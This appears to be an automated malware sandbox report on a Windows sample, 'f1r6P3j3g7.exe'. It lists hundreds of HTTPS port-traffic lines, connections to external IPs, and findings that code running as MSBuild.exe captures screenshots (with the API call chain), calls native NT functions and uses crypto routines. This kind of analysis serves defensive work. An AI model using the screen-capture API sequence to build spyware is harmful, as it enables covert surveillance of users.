Source: unknown	Network traffic detected: HTTP traffic on port 53870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53721
Source: unknown	Network traffic detected: HTTP traffic on port 53778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53841
Source: unknown	Network traffic detected: HTTP traffic on port 53790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53850
Source: unknown	Network traffic detected: HTTP traffic on port 53641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53852
Source: unknown	Network traffic detected: HTTP traffic on port 53744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53867
Source: unknown	Network traffic detected: HTTP traffic on port 53709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53866
Source: unknown	Network traffic detected: HTTP traffic on port 53686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53864
Source: unknown	Network traffic detected: HTTP traffic on port 53908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53863
Source: unknown	Network traffic detected: HTTP traffic on port 53743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53757
Source: unknown	Network traffic detected: HTTP traffic on port 53840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53878
Source: unknown	Network traffic detected: HTTP traffic on port 53710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53755
Source: unknown	Network traffic detected: HTTP traffic on port 53777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53876
Source: unknown	Network traffic detected: HTTP traffic on port 53664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53874
Source: unknown	Network traffic detected: HTTP traffic on port 53791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53880
Source: unknown	Network traffic detected: HTTP traffic on port 53721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53801
Source: unknown	Network traffic detected: HTTP traffic on port 53816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown	Network traffic detected: HTTP traffic on port 53860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53806
Source: unknown	Network traffic detected: HTTP traffic on port 53883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53805
Source: unknown	Network traffic detected: HTTP traffic on port 53839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 53768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53809
Source: unknown	Network traffic detected: HTTP traffic on port 53651 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53813
Source: unknown	Network traffic detected: HTTP traffic on port 53697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53817
Source: unknown	Network traffic detected: HTTP traffic on port 53733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53811
Source: unknown	Network traffic detected: HTTP traffic on port 53662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown	Network traffic detected: HTTP traffic on port 53895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53709
Source: unknown	Network traffic detected: HTTP traffic on port 53734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53827
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53701
Source: unknown	Network traffic detected: HTTP traffic on port 53663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53820
Source: unknown	Network traffic detected: HTTP traffic on port 53827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53837
Source: unknown	Network traffic detected: HTTP traffic on port 53838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53713
Source: unknown	Network traffic detected: HTTP traffic on port 53756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53719
Source: unknown	Network traffic detected: HTTP traffic on port 53861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53838
Source: unknown	Network traffic detected: HTTP traffic on port 53700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53830
Source: unknown	Network traffic detected: HTTP traffic on port 53767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53683
Source: unknown	Network traffic detected: HTTP traffic on port 53906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53687
Source: unknown	Network traffic detected: HTTP traffic on port 53850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53693
Source: unknown	Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53690
Source: unknown	Network traffic detected: HTTP traffic on port 53873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53694
Source: unknown	Network traffic detected: HTTP traffic on port 53758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53699
Source: unknown	Network traffic detected: HTTP traffic on port 53666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53698
Source: unknown	Network traffic detected: HTTP traffic on port 53826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53667 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53649
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53647
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53641
Source: unknown	Network traffic detected: HTTP traffic on port 53736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53761
Source: unknown	Network traffic detected: HTTP traffic on port 53759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53640
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53646
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53645
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown	Network traffic detected: HTTP traffic on port 53665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53885
Source: unknown	Network traffic detected: HTTP traffic on port 53802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53770
Source: unknown	Network traffic detected: HTTP traffic on port 53771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown	Network traffic detected: HTTP traffic on port 53863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53659
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53779
Source: unknown	Network traffic detected: HTTP traffic on port 53836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53653
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53651
Source: unknown	Network traffic detected: HTTP traffic on port 53702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53657
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53656
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53655
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53896
Source: unknown	Network traffic detected: HTTP traffic on port 53907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53780
Source: unknown	Network traffic detected: HTTP traffic on port 53874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53663
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53665
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53786
Source: unknown	Network traffic detected: HTTP traffic on port 53792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53671
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53670
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53791
Source: unknown	Network traffic detected: HTTP traffic on port 53714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown	Network traffic detected: HTTP traffic on port 53747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53676
Source: unknown	Network traffic detected: HTTP traffic on port 53824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53681
Source: unknown	Network traffic detected: HTTP traffic on port 53770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53680
Source: unknown	Network traffic detected: HTTP traffic on port 53654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53646 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53876 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6CBCED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CC0B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B8C0 rand_s,NtQueryVirtualMemory,	3_2_6CC0B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CC0B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CBAF280

Detected potential crypto function

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F2021	0_2_008F2021
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A1BB	0_2_0094A1BB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F729C	0_2_008F729C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090D39B	0_2_0090D39B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093E36F	0_2_0093E36F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_009364F5	0_2_009364F5
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093945D	0_2_0093945D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A559	0_2_0094A559
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_009386FD	0_2_009386FD
